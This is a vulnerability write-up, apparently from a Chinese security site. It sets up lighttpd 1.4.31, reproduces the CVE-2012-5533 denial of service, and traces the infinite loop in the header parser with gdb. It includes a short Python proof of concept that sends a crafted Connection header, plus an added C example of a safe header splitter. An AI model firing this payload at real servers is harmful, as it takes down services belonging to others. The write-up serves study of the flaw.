lighttpd domain processing denial of service vulnerability: from environment setup and reproduction to analysis (vulnerability warning, myhack58)

2017-08-23 00:00:00
virwolf
www.myhack58.com

I. Building the environment for the lighttpd denial of service vulnerability
1) Install lighttpd
Because this vulnerability requires a specific version, we need to install it manually.

wget http://download.lighttpd.net/lighttpd/releases-1.4.x/lighttpd-1.4.31.tar.gz
tar -zxvf lighttpd-1.4.31.tar.gz
cd lighttpd-1.4.31

At this point the next step is to run

./configure

but this step may produce the following error:

configure: error: pcre-config not found, install the pcre-devel package or bui with --without-pcre

We need to run:

yum install gcc glib2-devel openssl-devel pcre-devel bzip2-devel gzip-devel zlib-devel

to install the missing dependency packages. After they are installed, continue with

./configure
make && make install

When compilation is complete, go on to step two.
2) Copy the lighttpd executable
Create a working directory:

mkdir lighttpd-test
cd lighttpd-test

Copy the binary into it:

cp /usr/local/sbin/lighttpd home/lighttpd-test/
3) Create the configuration file

vim lighttpd.conf

Write:

server.document-root = "/var/www/"
server.port = 8080
server.username = "www"
server.groupname = "www"
mimetype.assign = (
  ".html" => "text/html",
  ".txt" => "text/plain",
  ".jpg" => "image/jpeg",
  ".png" => "image/png"
)
static-file.exclude-extensions = ( ".fcgi", ".php", ".rb", "~", ".inc" )
index-file.names = ( "index.html" )
4) Write your own welcome page (index.html)

vim /var/www/index.html

<html>
<head><title>Hello</title></head>
<body>
<h1>This is a test</h1>
</body>
</html>
5) Open the firewall and start the lighttpd service
Open the firewall port:

iptables -I INPUT -p tcp --dport 8080 -j ACCEPT

Start the service:

./lighttpd -f lighttpd.conf

Note: the service must be started with an absolute path here; alternatively, you can add the directory to your PATH environment variable, where the path is home/lighttpd-test/.
After starting, it reports that the server has started.
Next, you can test it in the browser:

http://127.0.0.1:8080

OK, after loading it displays the welcome page we wrote ourselves.
![](/Article/UploadPic/2017-8/201782318520907.png)

II. Principle of the lighttpd denial of service vulnerability and its reproduction
1) Principle. Vulnerability description: CVE ID: CVE-2012-5533
lighttpd is an open source lightweight [Web server](http://www.myhack58.com/Article/sort099/sort0100/Article_100_1.htm).
When lighttpd 1.4.31 processes certain HTTP request headers, the "http_request_split_value()" function (src/request.c) falls into an infinite loop while handling a specially crafted "Connection" header field. An attacker exploiting this vulnerability can cause a lighttpd denial of service.
2) Reproducing the vulnerability
Vulnerability script: https://www.exploit-db.com/exploits/22902/
This script is a bash script, so its permissions need to be changed first. In the script's directory run:

chmod +x test.sh

Then run:

./test.sh

Good, it executes successfully.
The Python script it contains:

# encoding: utf-8
import socket

if __name__ == '__main__':
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.connect(('192...**', 8080))   # the target address is redacted in the original
    sock.send(b'GET / HTTP/1.1\r\nHost: pwn.ed\r\nConnection: TE,Keep-Alive\r\n\r\n')
    sock.close()
    print('ok')
Notes:
Commands:

ps aux | grep "light*"

View the process information of the lighttpd service.

top

View the task manager.

kill -9 PID

Kill a process.
III. Tracing the cause of the vulnerability with combined dynamic and static analysis
Earlier we learned that the function responsible for the vulnerability is "http_request_split_value()" in src/request.c, so we first locate that function; here I simply cut the function out:
![](/Article/UploadPic/2017-8/201782318520721.png)
Let's look more closely at the code marked in red. On entry to the function, b certainly has a value, so execution enters the for loop. The initial state is 0, so it goes into case 0; but look carefully: the for loop inside case 0 is in fact never executed. So case 0 just does state = 1; break; and leaves the switch...case. The outer for loop continues with state = 1 and enters case 1: start = s, then the inner for loop runs while the current character is not ',', doing i++, and then execution reaches the if statement. The if condition is start == s, so break executes; the outer for loop therefore continues with state still 1 and enters case 1 again.
Someone will say that even so, the for loop must end eventually. Then look carefully at the value of i in the first for loop: according to the data the exploit script sends, there are only two bytes in front of the ',' in the script's payload, so once the current character equals ',' nothing changes any more, and the result is an infinite loop.
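The root cause in the analysis above is a parser state (case 1) that can be re-entered without consuming any input. As an added illustration that is not lighttpd's own code, here is a header-value splitter in C written as the same two-state machine, with the invariant that every pass of the outer loop advances the cursor by one byte, so an empty token or stray whitespace is skipped instead of looped on; all names in it are my own, and the inputs other than the page's "TE,Keep-Alive" are constructed samples.

```c
/* Added example, not lighttpd's code: a header-value splitter built as the
 * two-state machine described above (0 = between tokens, 1 = inside one). The
 * loop advances p on every pass, so empty tokens and whitespace are consumed,
 * never re-entered. All names are my own. */
#include <string.h>
#define MAX_TOKENS 16
#define MAX_TOKEN_LEN 64

typedef struct { int count; char items[MAX_TOKENS][MAX_TOKEN_LEN]; } token_list;
/* Returns the number of trimmed, non-empty tokens, or -1 if a limit is hit. */
int split_header_value(const char *value, token_list *out)
{
    const char *p = value, *start = NULL;
    int state = 0;
    out->count = 0;
    for (;; p++) {                          /* progress guarantee: p++ every pass */
        char c = *p;
        if (state == 0) {                   /* between tokens */
            if (c == ' ' || c == '\t' || c == ',') continue;  /* ws or empty token */
            if (c == '\0') break;
            start = p;                      /* first byte of a token */
            state = 1;
        } else if (c == ',' || c == '\0') { /* end of the current token */
            const char *end = p;
            while (end > start && (end[-1] == ' ' || end[-1] == '\t')) end--;
            size_t len = (size_t)(end - start);
            if (out->count >= MAX_TOKENS || len >= MAX_TOKEN_LEN) return -1;
            memcpy(out->items[out->count], start, len);
            out->items[out->count][len] = '\0';
            out->count++;
            state = 0;
            if (c == '\0') break;
        }
    }
    return out->count;
}

/* Check helpers: token count, and whether token idx equals expect (1 = yes). */
int token_count(const char *value)
{
    token_list t;
    return split_header_value(value, &t);
}

int token_equals(const char *value, int idx, const char *expect)
{
    token_list t;
    if (split_header_value(value, &t) < 0 || idx >= t.count) return 0;
    return strcmp(t.items[idx], expect) == 0;
}
```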
Next, we use the gdb debugger for live debugging to verify whether it behaves as described above.
Run the exploit script, then use the command

gdb -p PID

to attach gdb to the lighttpd process.
Debugging state:

![](/Article/UploadPic/2017-8/201782318520410.png)
